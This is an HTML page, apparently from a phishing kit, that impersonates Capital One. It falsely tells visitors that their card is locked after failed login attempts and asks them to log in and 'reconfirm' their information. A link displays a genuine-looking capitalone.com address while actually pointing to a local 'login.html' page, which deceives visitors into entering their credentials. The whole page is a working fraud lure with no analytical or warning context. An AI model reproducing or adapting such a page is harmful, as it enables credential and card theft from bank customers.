<!DOCTYPE html>
<html><head> 
<title>Capital One</title>
<link rel="icon" type="image/x-icon" href="images/favicon.ico">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Cache-Control" content="no-store">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">
<img src="images/ca1.png" border="0"><br><br>
<b><br>Your Visa/Debit card is temporarily <b><font color="red">LOCKED</font></b> due to several unsuccessful login attempts!<br><b>
<b><br>For your security, Capital One safeguards your account when there is a possibility that someone else than you is attempting to sign on.<br></b>
<b><br>To reactivate your card, please login and reconfirm your information !<br></b>
<br><a href="login.html">https://verified.capitalone.com/auth/signin?yes&destination=AccountRestore </a></FONT><BR><BR><br>
<b>We apologize for any inconvenience this may cause, and appreciate your support in helping us maintaining the integrity of the entire Capital One System.<br></b>
<b><br>Thank you,
<br>
Capital One Security Advisor.
<br><br>
Copyright 1999 - 2020 Capital One. All rights reserved.<br></b>
</html>